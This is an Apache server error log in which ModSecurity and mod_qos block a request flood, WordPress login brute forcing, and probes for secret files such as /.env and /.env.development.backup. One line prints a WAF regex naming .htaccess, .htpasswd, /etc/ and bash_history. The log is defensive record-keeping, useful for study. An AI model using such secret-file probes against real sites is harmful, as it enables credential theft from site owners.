[Tue May 26 19:54:19.406385 2026] [security2:error] [pid 93868:tid 94356] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEUqK9k_ZUB2Vp25HnAAAAfE"]
[Tue May 26 19:54:19.427428 2026] [security2:error] [pid 93576:tid 93725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEmDRMqfxdEDkoszPNwAAAA0"]
[Tue May 26 19:54:19.429493 2026] [security2:error] [pid 93576:tid 93719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEmDRMqfxdEDkoszPNQAAAAc"]
[Tue May 26 19:54:19.430231 2026] [security2:error] [pid 86490:tid 86646] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6PAAAAJ8"]
[Tue May 26 19:54:19.439331 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEmDRMqfxdEDkoszPNgAAACI"]
[Tue May 26 19:54:19.439589 2026] [security2:error] [pid 86490:tid 86639] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6PwAAAJg"]
[Tue May 26 19:54:19.445220 2026] [security2:error] [pid 86490:tid 86740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6QAAAAP0"]
[Tue May 26 19:54:19.447078 2026] [security2:error] [pid 93576:tid 93765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEmDRMqfxdEDkoszPOQAAADU"]
[Tue May 26 19:54:19.470947 2026] [security2:error] [pid 86490:tid 86660] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6PQAAAK0"]
[Tue May 26 19:54:19.478160 2026] [security2:error] [pid 86490:tid 86620] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6QwAAAIU"]
[Tue May 26 19:54:19.571561 2026] [qos:error] [pid 86490:tid 86725] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtE1ZMwN0DpLVWo6K68QAAAO4
[Tue May 26 19:54:19.578002 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE2DRMqfxdEDkoszPUQAAAE4
[Tue May 26 19:54:19.579247 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtE1ZMwN0DpLVWo6K69QAAAOA
[Tue May 26 19:54:19.586312 2026] [qos:error] [pid 86490:tid 86628] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtE1ZMwN0DpLVWo6K69wAAAI0
[Tue May 26 19:54:19.594771 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE2DRMqfxdEDkoszPUwAAADE
[Tue May 26 19:54:19.595039 2026] [qos:error] [pid 86490:tid 86740] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtE1ZMwN0DpLVWo6K6-AAAAP0
[Tue May 26 19:54:19.599919 2026] [qos:error] [pid 86490:tid 86669] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6-gAAALY
[Tue May 26 19:54:19.602707 2026] [qos:error] [pid 93868:tid 94360] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtE0qK9k_ZUB2Vp25HzgAAAfU
[Tue May 26 19:54:19.624939 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE2DRMqfxdEDkoszPVQAAACA
[Tue May 26 19:54:19.630968 2026] [qos:error] [pid 86490:tid 86642] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K6_wAAAJs
[Tue May 26 19:54:19.722672 2026] [qos:error] [pid 86490:tid 86620] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K7AAAAAIU
[Tue May 26 19:54:19.726060 2026] [qos:error] [pid 93576:tid 93825] [client 45.148.10.120:35302] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE2DRMqfxdEDkoszPVwAAAHE
[Tue May 26 19:54:19.732410 2026] [qos:error] [pid 86490:tid 86691] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K7AQAAAMw
[Tue May 26 19:54:19.734835 2026] [qos:error] [pid 86490:tid 86655] [client 45.148.10.120:34818] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K7AgAAAKg
[Tue May 26 19:54:19.737430 2026] [security2:error] [pid 86490:tid 86741] [client 185.177.72.53:35070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.development.backup"] [unique_id "ahWtE1ZMwN0DpLVWo6K7AwAAAP4"]
[Tue May 26 19:54:19.746724 2026] [qos:error] [pid 93576:tid 93772] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE2DRMqfxdEDkoszPWAAAADw
[Tue May 26 19:54:19.751919 2026] [qos:error] [pid 86490:tid 86628] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K7BAAAAI0
[Tue May 26 19:54:19.754562 2026] [qos:error] [pid 86490:tid 86670] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K7BQAAALc
[Tue May 26 19:54:19.761080 2026] [qos:error] [pid 93576:tid 93764] [client 45.148.10.120:35270] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE2DRMqfxdEDkoszPWQAAADQ
[Tue May 26 19:54:19.775132 2026] [qos:error] [pid 93576:tid 93788] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE2DRMqfxdEDkoszPWgAAAEw
[Tue May 26 19:54:19.787663 2026] [qos:error] [pid 86490:tid 86687] [client 45.148.10.120:34862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtE1ZMwN0DpLVWo6K7BgAAAMg
[Tue May 26 19:54:20.287071 2026] [security2:error] [pid 93868:tid 94299] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEkqK9k_ZUB2Vp25HrQAAAbg"]
[Tue May 26 19:54:20.289497 2026] [security2:error] [pid 93576:tid 93763] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEmDRMqfxdEDkoszPKAAAADM"]
[Tue May 26 19:54:20.294762 2026] [security2:error] [pid 86490:tid 86717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6SgAAAOY"]
[Tue May 26 19:54:20.309855 2026] [security2:error] [pid 86490:tid 86666] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6VgAAALM"]
[Tue May 26 19:54:20.310702 2026] [security2:error] [pid 86490:tid 86683] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6SwAAAMQ"]
[Tue May 26 19:54:20.310941 2026] [security2:error] [pid 93576:tid 93839] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEmDRMqfxdEDkoszPMQAAAH8"]
[Tue May 26 19:54:20.311375 2026] [security2:error] [pid 93576:tid 93837] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEmDRMqfxdEDkoszPJwAAAH0"]
[Tue May 26 19:54:20.311606 2026] [security2:error] [pid 93576:tid 93757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEmDRMqfxdEDkoszPJAAAAC0"]
[Tue May 26 19:54:20.316107 2026] [security2:error] [pid 86490:tid 86678] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6RwAAAL8"]
[Tue May 26 19:54:20.320502 2026] [security2:error] [pid 86490:tid 86693] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6TgAAAM4"]
[Tue May 26 19:54:20.330536 2026] [security2:error] [pid 86490:tid 86636] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6QQAAAJU"]
[Tue May 26 19:54:20.332539 2026] [security2:error] [pid 93576:tid 93814] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEmDRMqfxdEDkoszPNAAAAGY"]
[Tue May 26 19:54:20.334144 2026] [security2:error] [pid 86490:tid 86675] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6RAAAALw"]
[Tue May 26 19:54:20.338729 2026] [security2:error] [pid 86490:tid 86584] [remote 132.148.78.219:43364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.78.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWtFFZMwN0DpLVWo6K7EQAA5l0"], referer: https://filosha.com/wp-login.php
[Tue May 26 19:54:20.343609 2026] [security2:error] [pid 86490:tid 86652] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6XQAAAKU"]
[Tue May 26 19:54:20.352822 2026] [security2:error] [pid 86490:tid 86637] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6VAAAAJY"]
[Tue May 26 19:54:20.366833 2026] [security2:error] [pid 93868:tid 94273] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtEkqK9k_ZUB2Vp25HsAAAAZ4"]
[Tue May 26 19:54:20.370073 2026] [security2:error] [pid 86490:tid 86668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6aAAAALU"]
[Tue May 26 19:54:20.388004 2026] [security2:error] [pid 86490:tid 86727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6ZgAAAPA"]
[Tue May 26 19:54:20.402791 2026] [security2:error] [pid 86490:tid 86723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE1ZMwN0DpLVWo6K6wgAAAOw"]
[Tue May 26 19:54:20.412730 2026] [security2:error] [pid 86490:tid 86715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE1ZMwN0DpLVWo6K6twAAAOQ"]
[Tue May 26 19:54:20.414638 2026] [security2:error] [pid 86490:tid 86647] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE1ZMwN0DpLVWo6K6xQAAAKA"]
[Tue May 26 19:54:20.415521 2026] [security2:error] [pid 86490:tid 86627] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE1ZMwN0DpLVWo6K6xgAAAIw"]
[Tue May 26 19:54:20.418424 2026] [security2:error] [pid 86490:tid 86713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6WAAAAOI"]
[Tue May 26 19:54:20.421329 2026] [security2:error] [pid 86490:tid 86689] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE1ZMwN0DpLVWo6K6tgAAAMo"]
[Tue May 26 19:54:20.421364 2026] [security2:error] [pid 86490:tid 86696] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE1ZMwN0DpLVWo6K6yAAAANE"]
[Tue May 26 19:54:20.423719 2026] [security2:error] [pid 86490:tid 86714] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6agAAAOM"]
[Tue May 26 19:54:20.437980 2026] [security2:error] [pid 86490:tid 86718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE1ZMwN0DpLVWo6K6ugAAAOc"]
[Tue May 26 19:54:20.440972 2026] [security2:error] [pid 93868:tid 94314] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE0qK9k_ZUB2Vp25HwQAAAcc"]
[Tue May 26 19:54:20.444342 2026] [security2:error] [pid 93576:tid 93811] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE2DRMqfxdEDkoszPRwAAAGM"]
[Tue May 26 19:54:20.448939 2026] [security2:error] [pid 93576:tid 93787] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE2DRMqfxdEDkoszPSAAAAEs"]
[Tue May 26 19:54:20.450329 2026] [security2:error] [pid 86490:tid 86747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtElZMwN0DpLVWo6K6UAAAAQQ"]
[Tue May 26 19:54:20.460934 2026] [security2:error] [pid 93576:tid 93739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE2DRMqfxdEDkoszPSQAAABs"]
[Tue May 26 19:54:20.462315 2026] [security2:error] [pid 93868:tid 94343] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtE0qK9k_ZUB2Vp25HwgAAAeQ"]
[Tue May 26 19:54:20.712257 2026] [security2:error] [pid 86490:tid 86683] [client 185.177.72.53:35070] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/tunnel/.env"] [unique_id "ahWtFFZMwN0DpLVWo6K7JQAAAMQ"]
[Tue May 26 19:54:20.897577 2026] [security2:error] [pid 86490:tid 86670] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtFFZMwN0DpLVWo6K7FAAAALc"]
[Tue May 26 19:54:21.020422 2026] [qos:error] [pid 93868:tid 94319] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtFUqK9k_ZUB2Vp25H9wAAAcw
[Tue May 26 19:54:21.020712 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWtFWDRMqfxdEDkoszPfgAAAHU
[Tue May 26 19:54:21.021088 2026] [qos:error] [pid 93868:tid 94304] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtFUqK9k_ZUB2Vp25H-AAAAb0
[Tue May 26 19:54:21.022958 2026] [qos:error] [pid 93868:tid 94333] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtFUqK9k_ZUB2Vp25H-gAAAdo
[Tue May 26 19:54:21.027880 2026] [qos:error] [pid 86490:tid 86747] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7UAAAAQQ
[Tue May 26 19:54:21.028699 2026] [qos:error] [pid 86490:tid 86703] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7UQAAANg
[Tue May 26 19:54:21.030778 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtFWDRMqfxdEDkoszPgQAAAG0
[Tue May 26 19:54:21.033884 2026] [qos:error] [pid 86490:tid 86735] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7UgAAAPg
[Tue May 26 19:54:21.035796 2026] [qos:error] [pid 93576:tid 93759] [client 45.148.10.120:35246] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFWDRMqfxdEDkoszPgwAAAC8
[Tue May 26 19:54:21.037880 2026] [qos:error] [pid 86490:tid 86656] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7VAAAAKk
[Tue May 26 19:54:21.169227 2026] [qos:error] [pid 93576:tid 93773] [client 45.148.10.120:35282] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFWDRMqfxdEDkoszPiQAAAD0
[Tue May 26 19:54:21.169235 2026] [qos:error] [pid 86490:tid 86742] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7VgAAAP8
[Tue May 26 19:54:21.173173 2026] [qos:error] [pid 86490:tid 86637] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7VwAAAJY
[Tue May 26 19:54:21.175306 2026] [qos:error] [pid 86490:tid 86655] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7WQAAAKg
[Tue May 26 19:54:21.177220 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7WgAAANk
[Tue May 26 19:54:21.182155 2026] [qos:error] [pid 86490:tid 86722] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7WwAAAOs
[Tue May 26 19:54:21.182478 2026] [qos:error] [pid 86490:tid 86740] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtFVZMwN0DpLVWo6K7XAAAAP0
